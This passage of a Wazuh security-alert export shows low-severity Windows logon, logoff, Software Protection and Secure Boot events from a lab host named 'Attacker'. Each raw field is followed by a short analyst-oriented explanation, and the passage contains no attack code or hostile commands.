Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533883.62331
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.5733269Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43455
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FC0D Linked Logon ID: 0x1E7FD31 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fc0d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Length in bits of the session key generated for this logon (e.g., 128). A value of 0 means no session key was requested, as the message text itself notes; short non‑zero lengths point to a downgraded protocol.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x1e7fd31
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:23.933+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:23.933+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533883.70051
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:53:02.6493207Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2359
Incremental log record number – handy for timeline order.

data.win.system.processID:  9524
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:37:02Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-18T16:37:02Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:23.956+0000 | 🧠 MITRE: Defense Evasion, Persistence, Privilege Escalation, Initial Access – Valid Accounts [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:23.956+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533883.71629
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.5733520Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43456
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: No Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FD31 Linked Logon ID: 0x1E7FC0D Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
- Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fd31
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Length in bits of the session key generated for this logon (e.g., 128). A value of 0 means no session key was requested, as the message text itself notes; short non‑zero lengths point to a downgraded protocol.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x1e7fc0d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.183+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.183+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.79347
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-TPM-WMI
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {7d5387b0-cbe0-11da-a94d-0800200c9a66}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1796
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:38:01.9174262Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2887
Incremental log record number – handy for timeline order.

data.win.system.processID:  12516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12400
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hResult:  -2147020471
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.323+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.323+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.80933
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:24.5862980Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43458
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11484
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x1E7FD31 Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x1e7fd31
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:24.460+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:24.460+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533884.83399
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
